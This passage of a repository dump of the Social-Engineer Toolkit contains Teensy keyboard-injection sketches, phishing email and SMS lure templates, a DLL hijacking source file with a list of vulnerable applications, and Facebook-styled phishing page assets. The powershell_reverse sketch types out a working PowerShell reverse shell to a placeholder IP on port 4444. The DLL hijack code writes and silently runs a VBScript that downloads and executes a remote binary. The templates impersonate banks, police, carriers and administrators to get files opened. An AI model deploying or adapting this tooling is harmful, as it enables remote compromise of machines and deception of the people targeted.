Keyboard.send_now(); 30 | Keyboard.set_modifier(0); 31 | Keyboard.set_key1(0); 32 | Keyboard.send_now(); 33 | delay(1500); 34 | Keyboard.println(SomeCommand); 35 | } 36 | -------------------------------------------------------------------------------- /src/teensy/powershell_reverse.pde: -------------------------------------------------------------------------------- 1 | // 2 | // Social-Engineer Toolkit Teensy Attack Vector 3 | // Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG) 4 | // 5 | // Special thanks to: Irongeek 6 | // You will need to setup a netcat listener MSF cannot handle this payload 7 | // 8 | // 2011-02-28 padzero@gmail.com 9 | // * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets 10 | // * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies 11 | // 12 | 13 | #define ascii_println Keyboard.println 14 | 15 | void setup() { 16 | delay(10000); 17 | omg("powershell"); 18 | delay(1000); 19 | // Here is the payload... 20 | // This is a reverse bind shell through powershell. I need to fix it use the 21 | // bind shell. The reverse bind shell code is cleaner though. 22 | // I bet we could use the dip switches to configure the IP addy or port... 23 | ascii_println("function cleanup {"); 24 | ascii_println("if ($client.Connected -eq $true) {$client.Close()}"); 25 | ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}"); 26 | ascii_println("exit}"); 27 | // Setup IPADDR HERE 28 | ascii_println("$address = 'IPADDR'"); 29 | // Setup PORT HERE 30 | ascii_println("$port = '4444'"); 31 | ascii_println("$client = New-Object system.net.sockets.tcpclient"); 32 | ascii_println("$client.connect($address,$port)"); 33 | ascii_println("$stream = $client.GetStream()"); 34 | ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); 35 | ascii_println("$process = New-Object System.Diagnostics.Process"); 36 | ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); 37 | ascii_println("$process.StartInfo.RedirectStandardInput = 1"); 38 | ascii_println("$process.StartInfo.RedirectStandardOutput = 1"); 39 | ascii_println("$process.StartInfo.UseShellExecute = 0"); 40 | ascii_println("$process.Start()"); 41 | ascii_println("$inputstream = $process.StandardInput"); 42 | ascii_println("$outputstream = $process.StandardOutput"); 43 | ascii_println("Start-Sleep 1"); 44 | ascii_println("$encoding = new-object System.Text.AsciiEncoding"); 45 | ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); 46 | ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); 47 | ascii_println("$out = $null; $done = $false; $testing = 0;"); 48 | ascii_println("while (-not $done) {"); 49 | ascii_println("if ($client.Connected -ne $true) {cleanup}"); 50 | ascii_println("$pos = 0; $i = 1"); 51 | ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); 52 | ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); 53 | ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); 54 | ascii_println("if ($pos -gt 0) {"); 55 | ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)"); 56 | ascii_println("$inputstream.write($string)"); 57 | ascii_println("start-sleep 1"); 58 | ascii_println("if ($process.ExitCode -ne $null) {cleanup}"); 59 | ascii_println("else {"); 60 | ascii_println("$out = $encoding.GetString($outputstream.Read())"); 61 | ascii_println("while($outputstream.Peek() -ne -1){"); 62 | ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); 63 | ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); 64 | ascii_println("$out = $null"); 65 | ascii_println("$string = $null}} else {cleanup}}"); 66 | ascii_println(""); //Enter to start execution 67 | } 68 | 69 | void loop() { 70 | } 71 | 72 | void omg(char *SomeCommand) 73 | { 74 | Keyboard.set_modifier(128); 75 | Keyboard.set_key1(KEY_R); 76 | Keyboard.send_now(); 77 | Keyboard.set_modifier(0); 78 | Keyboard.set_key1(0); 79 | Keyboard.send_now(); 80 | delay(1500); 81 | ascii_println(SomeCommand); 82 | } 83 | -------------------------------------------------------------------------------- /src/teensy/wscript.pde: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/wscript.pde -------------------------------------------------------------------------------- /src/teensy/x10/libraries.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/teensy/x10/libraries.zip -------------------------------------------------------------------------------- /src/teensy/x10/x10_blackout.pde: -------------------------------------------------------------------------------- 1 | // Written by Rob Simon (kickenchicken57) 2 | // include the X10 library files: 3 | // Original library for sending 4 | // http://www.arduino.cc/en/Tutorial/X10 5 | 6 | // Send/Receive Library by creatrope 7 | // https://docs.google.com/leaf?id=0B5Sg6E9g_zOXMzQxZmVkYjktNjQwZi00MjgxLTk4YzQtNGIwYzI0ZjA0Njg3&hl=en_US 8 | 9 | #include 10 | #include 11 | 12 | #define zcPin 12 // the zero crossing detect pin 13 | #define dataPin 13 // the X10 data out pin 14 | #define repeatTimes 1 15 | 16 | // set up a new x10 library instance: 17 | x10 myHouse = x10(zcPin, dataPin); 18 | 19 | void setup() { 20 | } 21 | 22 | void loop() { 23 | myHouse.write(A, ALL_UNITS_OFF,repeatTimes); 24 | } 25 | -------------------------------------------------------------------------------- /src/teensy/x10/x10_sniffer.pde: -------------------------------------------------------------------------------- 1 | /* Arduino Interface to the PSC05 X10 Receiver. BroHogan 3/24/09 2 | * SETUP: X10 PSC05/TW523 RJ11 to Arduino (timing for 60Hz) 3 | * - RJ11 pin 1 (BLK) -> Pin 2 (Interrupt 0) = Zero Crossing 4 | * - RJ11 pin 2 (RED) -> GND 5 | * - RJ11 pin 3 (GRN) -> Pin 4 = Arduino receive 6 | * - RJ11 pin 4 (YEL) -> Pin 5 = Arduino transmit (via X10 Lib) 7 | * NOTES: 8 | * - Must detach interrup when transmitting with X10 Lib 9 | * Written by: Rob Simon (kickenchicken57) 10 | * Original library for sending 11 | * http://www.arduino.cc/en/Tutorial/X10 12 | * Send/Receive Library by creatrope 13 | * https://docs.google.com/leaf?id=0B5Sg6E9g_zOXMzQxZmVkYjktNjQwZi00MjgxLTk4YzQtNGIwYzI0ZjA0Njg3&hl=en_US 14 | */ 15 | 16 | #include "WProgram.h" // this is needed to compile with Rel. 0013 17 | #include // X10 lib is used for transmitting X10 18 | #include // X10 Lib constants 19 | #define RPT_SEND 2 20 | 21 | #define ZCROSS_PIN 2 // BLK pin 1 of PSC05 22 | #define RCVE_PIN 4 // GRN pin 3 of PSC05 23 | #define TRANS_PIN 5 // YEL pin 4 of PSC05 24 | #define LED_PIN 13 // for testing 25 | 26 | x10 SX10= x10(ZCROSS_PIN,TRANS_PIN,RCVE_PIN,LED_PIN);// set up a x10 library instance: 27 | 28 | void setup() { 29 | Serial.begin(9600); 30 | } 31 | 32 | // A simple test program that demonstrates integrated send/receive 33 | // prints X10 input, then sets D5 on/off if unit code on input was 1 34 | void loop() 35 | { 36 | if (SX10.received()) 37 | { // received a new command 38 | SX10.debug(); // print out the received command 39 | SX10.reset(); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/templates/31328256862518006364.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="WOAAAA!!!!!!!!!! This is crazy..." 6 | 7 | BODY="You have to see the attached file... I can't believe it...\n" 8 | -------------------------------------------------------------------------------- /src/templates/4842870413984355770.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="How long has it been?" 6 | 7 | BODY="How long has it been since you saw this? Attached...\n" 8 | -------------------------------------------------------------------------------- /src/templates/84863010888203269076.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy (ReL1K) 2 | # 3 | # 4 | # 5 | SUBJECT="Have you seen this?" 6 | 7 | BODY="Hey.. Not sure if you saw this but I wasn't aware of it...\n" 8 | -------------------------------------------------------------------------------- /src/templates/baby.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Baby pics author 4 | # 5 | SUBJECT="Baby Pics" 6 | 7 | BODY="Baby pics of little Sabitha at 6 months, shes so cute.." 8 | -------------------------------------------------------------------------------- /src/templates/ebook.template: -------------------------------------------------------------------------------- 1 | # Author: The_UnKn@wn 2 | # 3 | # 4 | # 5 | SUBJECT="Dan Brown's Angels & Demons" 6 | 7 | BODY="Hey\n\nI found a pdf version of Dan Brown's book "Angels & Demons" on the internet.\nI already read the book and it is great. You will enjoy reading it at least once.\n\nHave fun reading it and write me back how you liked it.\n\nBye\n" 8 | -------------------------------------------------------------------------------- /src/templates/newupdate.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # 4 | # 5 | SUBJECT="New Update" 6 | 7 | BODY="There was a new update to the overall document that I need you to review. You'll notice the changes on page 2 and 3. \n\nThanks for the help!\n\nJames\n" 8 | -------------------------------------------------------------------------------- /src/templates/receipt.template: -------------------------------------------------------------------------------- 1 | # Author: Ruben Alejandro (chap0) 2 | # 3 | # 4 | # 5 | SUBJECT="Order Confirmation" 6 | 7 | BODY="Hello,\nAttached you will find your receipt for the order that you placed. Please be aware that it may take 2-3 business days for items to be shipped.\nIt has been a pleasure to have your business.\n\nThank you\n Jim Woznaky\n" 8 | 9 | -------------------------------------------------------------------------------- /src/templates/report.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Status Computer Issue 4 | # 5 | SUBJECT="Computer Issue" 6 | 7 | BODY="Greetings,\n\nI have been recently experiencing issues with my computer and have been unable to run this report, I believe that the file may be messed up however, I cannot confirm this. Can someone please take a look and identify if it is my machine or just this file? I have an immediate deadline to produce this report, any help would be greatly appreciated.\n\nSincerely,\n\nJeff" 8 | -------------------------------------------------------------------------------- /src/templates/sms/12161896267335046246.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221251" 6 | 7 | SUBJECT="Movistar: publicidad nieve" 8 | 9 | BODY="MS Publi:Entra en www.apuntatealanieve.es y participa en el sorteo de 50 packs de 2 forfaits para 2 dias en cualquier estacion de Aramon. Valido hasta el 2/03" 10 | -------------------------------------------------------------------------------- /src/templates/sms/16596172621284277248.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad verano internet" 8 | 9 | BODY="Movistar publi: Este verano sigue en Internet con el Kit INTERNET MOVIL PREPAGO.Si lo usas pagas,si no lo usas no pagas.Consiguelo en tu distribuidor movistar" 10 | -------------------------------------------------------------------------------- /src/templates/sms/18563883160952176830.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="teabla" 6 | 7 | SUBJECT="teabla: moviles gratis" 8 | 9 | BODY="Rebajas exclusivas para ti en teabla: Llevate el Nokia 2680 por 13000 puntos y 0 euros.Solo hasta 15/02/10. Registrate en www.teabla.es 902203050" 10 | -------------------------------------------------------------------------------- /src/templates/sms/27973430829013746123.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="7412" 6 | 7 | SUBJECT="TMB: temps espera" 8 | 9 | BODY="0488-Av de Madrid-Vallespir Linia Temps *54 5 min* Temps aproximat. TMB Gràcies" 10 | -------------------------------------------------------------------------------- /src/templates/sms/34070789312210934380.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221251" 6 | 7 | SUBJECT="Movistar: publicidad ROCKRIO" 8 | 9 | BODY="Movistar Publi:Vive ROCK&RIO al maximo con Movistar.Si eres de Telefonica o Movistar consigue tus entradas en movistar.es/rockinrio.SORTEAMOS 1.000. Hsta 19/04" 10 | -------------------------------------------------------------------------------- /src/templates/sms/43234513006619301607.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="2255" 6 | 7 | SUBJECT="Movistar: publicidad tarifa llamada" 8 | 9 | BODY="Movistar info: Recuerda q la Tarifa Diaria q ya disfrutas te permite llamar en Europa por slo 0,28e/min+0,57 (estb llam)+1,16e cada dia q la utilices.+inf 609" 10 | -------------------------------------------------------------------------------- /src/templates/sms/45723463533772650533.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="Movistar" 6 | 7 | SUBJECT="Movistar: oferta otoño" 8 | 9 | BODY="Publi:Hable en otoño 100 min y pague solo 1 hasta 9 nov cualquier destino nac(no incl establ)Alta 3,45e(iva incl)Y por 1,18 (iva incl)SMS al 50%.Alta en el 1200" 10 | -------------------------------------------------------------------------------- /src/templates/sms/48842587427349852379.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="474" 6 | 7 | SUBJECT="Yavoy: regalo yavoy" 8 | 9 | BODY="Publi:GRATIS tu primer Yavoy! Llama al 474, elige Yavoy preferido y nosotros te lo regalamos!D.Bisbal,Guetta,Baute,5a estacion...p.llam:0.15+0.30e/min" 10 | -------------------------------------------------------------------------------- /src/templates/sms/51366883259558865424.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="221252" 6 | 7 | SUBJECT="Movistar: publicidad aramon" 8 | 9 | BODY="movistar publi:Envia ARAMON al 7213 y consigue tu forfait ARAMONCLUB MOVISTAR con ventajas exclusivas y descuento hasta 20%.+info aramon.es" 10 | -------------------------------------------------------------------------------- /src/templates/sms/5366255995038334754.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="7770" 6 | 7 | SUBJECT="Tu Banco: visa disponible en oficina" 8 | 9 | BODY="TARGETA VISA JA DISPONIBLE A OFICINA DE RIERA BLANCA/TU BANCO.0000 LA RIERA BLANCA" 10 | -------------------------------------------------------------------------------- /src/templates/sms/61235614880419094815.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="M.vivienda" 6 | 7 | SUBJECT="Ministerio vivienda: incidencia pago" 8 | 9 | BODY="Ministerio de Vivienda. Tienes una incidencia en el pago de tu RBE. Motivo NO EXISTE VERIFICACION PAGO DEL ALQUILER info en www.alquilerjoven.es" 10 | -------------------------------------------------------------------------------- /src/templates/sms/65225885161440001690.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad navidad" 8 | 9 | BODY="Movistar Info:Cada año, las personas para las que eres importante te felicitan la Navidad.En movistar nos sumamos a ellas deseandote Feliz Navidad y Feliz 2010." 10 | -------------------------------------------------------------------------------- /src/templates/sms/71056159094763737298.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="86323663" 6 | 7 | SUBJECT="Vodafone: publicidad nuevo contrato" 8 | 9 | BODY="VF Info: El 1 de diciembre 2010 entra en vigor la nueva clausula 11 de las condiciones generales del contrato. Para informarte y oposicion consulta www.vodafone.es." 10 | -------------------------------------------------------------------------------- /src/templates/sms/81470651031833477694.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="609" 6 | 7 | SUBJECT="Movistar: publicidad nokia gratis" 8 | 9 | BODY="Movistar publi:por ser cliente Movistar tiene a 0 Euros un Nokia X6 con alta Tarifa Plana Internet movil Premium.Ms info en 609.Max 30.000 canjes hasta 31/3." 10 | -------------------------------------------------------------------------------- /src/templates/sms/89232956998478665492.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="2255" 6 | 7 | SUBJECT="Movistar: publicidad tarifa sms" 8 | 9 | BODY="Movistar publi: Con la Tarifa Diaria Europa los sms en Europa a 0,10e/sms y ahora las llamadas recibidas a 0e/min hasta el 12/4. ALTA Gratis llamando al 2255" 10 | -------------------------------------------------------------------------------- /src/templates/sms/93752647864031571599.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="5039" 6 | 7 | SUBJECT="MRW: pedido no entregado" 8 | 9 | BODY="MRW INFORMA: SU ENVIO 01111/1111100 NO HA PODIDO SER ENTREGADO POR AUSENCIA DEL DESTINATARIO. ROGAMOS CONTACTE CON SU FRANQUICIA MRW EN EL TLF. 933255454" 10 | -------------------------------------------------------------------------------- /src/templates/sms/98099561929676707961.template: -------------------------------------------------------------------------------- 1 | # Author: 2 | # 3 | # 4 | # 5 | ORIGIN="762" 6 | 7 | SUBJECT="ruralvia: confirmacion de transferencia" 8 | 9 | BODY="El Sr/Sra DAVID FERNANDEZ VAZQUEZ le comunica que ha realizado una transferencia desde ruralvia a su favor por importe de 500,20 Euro" 10 | -------------------------------------------------------------------------------- /src/templates/sms/fake_boss.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Boss Fake" 6 | BODY="Hi Michael, please come to office earlier tomorrow.\n\nI will wait you at 7 there" 7 | -------------------------------------------------------------------------------- /src/templates/sms/fake_police.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Police Fake" 6 | BODY="Dear Mr.Jackson, You are invited to nearest police station for questioning.\n\nPolice Department." 7 | -------------------------------------------------------------------------------- /src/templates/sms/fool_vodafone.template: -------------------------------------------------------------------------------- 1 | # Author: smsgang.com 2 | # 3 | # 4 | ORIGIN="8888" 5 | SUBJECT="Vodafone Fool" 6 | BODY="You have been charged 73 pounds for reading this SMS.\n\nThanks for using Vodafone." 7 | -------------------------------------------------------------------------------- /src/templates/status.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # 4 | # Latest Report Template 5 | # 6 | SUBJECT="Status Report" 7 | 8 | BODY="Greetings,\n\nPlease view the latest status report.\n\nThanks,\n\nRich" 9 | -------------------------------------------------------------------------------- /src/templates/strange.template: -------------------------------------------------------------------------------- 1 | # Author: David Kennedy 2 | # 3 | # Strange internet usage from your computer 4 | # 5 | 6 | SUBJECT="Strange internet usage from your computer" 7 | 8 | BODY="Greetings,\n\nWe have been noticing strange internet traffic originating from your computer. It appears there has been a small outbreak of viruses that may have spread across the network. We are attempting to remove these infections however need you to run the attached file in order to "clean" the system. Your help in this manner is greatly appreciated.\n\nWarm regards,\n\nThe Systems Administration Team" 9 | -------------------------------------------------------------------------------- /src/webattack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/__init__.py -------------------------------------------------------------------------------- /src/webattack/browser_exploits/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/browser_exploits/__init__.py -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/__init__.py -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.c.wscript: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the 4 | Social-Engineer Toolkit (SET) spear-phishing attack vector. 5 | 6 | This is an ugly cscript downloader, it works on all platforms but 7 | will rewrite in C later instead of cscript. 8 | 9 | strFileURL = "http://IPADDRHERE/x" 10 | strHDLocation = "C:\x.exe" 11 | Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") 12 | objXMLHTTP.open "GET", strFileURL, false 13 | objXMLHTTP.send() 14 | If objXMLHTTP.Status = 200 Then 15 | Set objADOStream = CreateObject("ADODB.Stream") 16 | objADOStream.Open 17 | objADOStream.Type = 1 18 | objADOStream.Write 19 | objXMLHTTP.ResponseBody 20 | objADOStream.Position = 0 21 | Set objFSO = Createobject("Scripting.FileSystemObject") 22 | If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation 23 | Set objFSO = Nothing 24 | objADOStream.SaveToFile strHDLocation 25 | objADOStream.Close 26 | Set objADOStream = Nothing 27 | End if 28 | Set objXMLHTTP = Nothing 29 | Set WshShell = WScript.CreateObject("WScript.Shell") 30 | WshShell.Run "c:\x.exe" 31 | 32 | */ 33 | 34 | #include 35 | #include 36 | #include 37 | 38 | 39 | 40 | int run() 41 | { 42 | 43 | FILE *file; 44 | char* command = "cmd /c cscript c:\\x.vbs"; // execute the vbs script after fopen write 45 | char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // in SET does a replace of the length of IP address then terminates with a null byte to remove the rest of the X's 46 | file = fopen("C:\\x.vbs", "w"); // write file x.vbs 47 | fprintf(file,"strFileURL = \"http://%s/x\"\nstrHDLocation = \"C:\\x.exe\"\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.open \"GET\", strFileURL, false\nobjXMLHTTP.send()\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject(\"ADODB.Stream\")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject(\"Scripting.FileSystemObject\")\nIf objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile strHDLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nWshShell.Run \"c:\\x.exe\"", host); // write the downloader file, this will grab an executable 48 | fclose(file); // close the file 49 | 50 | STARTUPINFO si; 51 | PROCESS_INFORMATION pi; 52 | 53 | ZeroMemory( &si, sizeof(si) ); 54 | si.cb = sizeof(si); 55 | ZeroMemory( &pi, sizeof(pi) ); 56 | si.dwFlags = STARTF_USESHOWWINDOW; 57 | si.wShowWindow = SW_HIDE; // hide the window 58 | 59 | // Start the child process. 60 | if( !CreateProcess( NULL, // No module name (use command line) 61 | command, // Command line 62 | NULL, // Process handle not inheritable 63 | NULL, // Thread handle not inheritable 64 | FALSE, // Set handle inheritance to FALSE 65 | 0, // No creation flags 66 | NULL, // Use parent's environment block 67 | NULL, // Use parent's starting directory 68 | &si, // Pointer to STARTUPINFO structure 69 | &pi ) // Pointer to PROCESS_INFORMATION structure 70 | ) 71 | 72 | // Wait until child process exits. 73 | WaitForSingleObject( pi.hProcess, INFINITE ); 74 | 75 | // Close process and thread handles. 76 | CloseHandle( pi.hProcess ); 77 | CloseHandle( pi.hThread ); 78 | sleep(5); 79 | 80 | exit(0); 81 | return 0; 82 | } 83 | 84 | BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) 85 | { 86 | run(); 87 | return 0; 88 | } 89 | 90 | -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/hijacking.dll -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/hijacking.dll.wscript: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/dll_hijacking/hijacking.dll.wscript -------------------------------------------------------------------------------- /src/webattack/dll_hijacking/repository: -------------------------------------------------------------------------------- 1 | Windows Address Book (Universal),wab,wab32res.dll 2 | Microsoft Help and Support Center,hlp,wshfra.dll 3 | wscript.exe (XP),wscript,wshfra.dll 4 | Microsoft Office PowerPoint 2007,pptx,rpawinet.dll 5 | Microsoft Group Converter,grp,imm.dll 6 | Safari v5.0.1,html,dwmapi.dll 7 | Firefox <= 3.6.8,html,dwmapi.dll 8 | Microsoft PowerPoint 2010,pptx,pptimpconv.dll 9 | Microsoft PowerPoint 2007,pptx,pp4x322.dll 10 | Microsoft Visio 2010,vsd,dwmapi.dll 11 | Microsoft Word 2007,docx,schannel.dll 12 | Microsoft Powerpoint 2007,pptx,schannel.dll 13 | Microsoft Windows Media Encoder 9,prx,msxml.dll 14 | Windows 7 and Vista Backup Utility,wbcat,fveapi.dll 15 | EnCase,endump,rsaenh.dll 16 | IBM Rational License Key Administrator,upd,IBFS32.DLL 17 | Microsoft RDP,rdp,ieframe.dll 18 | -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/css/facebox.css: -------------------------------------------------------------------------------- 1 | #facebox { 2 | position: absolute; 3 | top: 0; 4 | left: 0; 5 | z-index: 100; 6 | text-align: left; 7 | } 8 | 9 | 10 | #facebox .popup{ 11 | position:relative; 12 | border:3px solid rgba(0,0,0,0); 13 | -webkit-border-radius:5px; 14 | -moz-border-radius:5px; 15 | border-radius:5px; 16 | -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4); 17 | -moz-box-shadow:0 0 18px rgba(0,0,0,0.4); 18 | box-shadow:0 0 18px rgba(0,0,0,0.4); 19 | } 20 | 21 | #facebox .content { 22 | display:table; 23 | width: 370px; 24 | padding: 10px; 25 | background: #fff; 26 | -webkit-border-radius:4px; 27 | -moz-border-radius:4px; 28 | border-radius:4px; 29 | } 30 | 31 | #facebox .content > p:first-child{ 32 | margin-top:0; 33 | } 34 | #facebox .content > p:last-child{ 35 | margin-bottom:0; 36 | } 37 | 38 | #facebox .close{ 39 | position:absolute; 40 | top:5px; 41 | right:5px; 42 | padding:2px; 43 | background:#fff; 44 | } 45 | #facebox .close img{ 46 | opacity:0.3; 47 | } 48 | #facebox .close:hover img{ 49 | opacity:1.0; 50 | } 51 | 52 | #facebox .loading { 53 | text-align: center; 54 | } 55 | 56 | #facebox .image { 57 | text-align: center; 58 | } 59 | 60 | #facebox img { 61 | border: 0; 62 | margin: 0; 63 | } 64 | 65 | #facebox_overlay { 66 | position: fixed; 67 | top: 0px; 68 | left: 0px; 69 | height:100%; 70 | width:100%; 71 | } 72 | 73 | .facebox_hide { 74 | z-index:-100; 75 | } 76 | 77 | .facebox_overlayBG { 78 | background-color: #000; 79 | z-index: 99; 80 | } -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-left.png: -------------------------------------------------------------------------------- 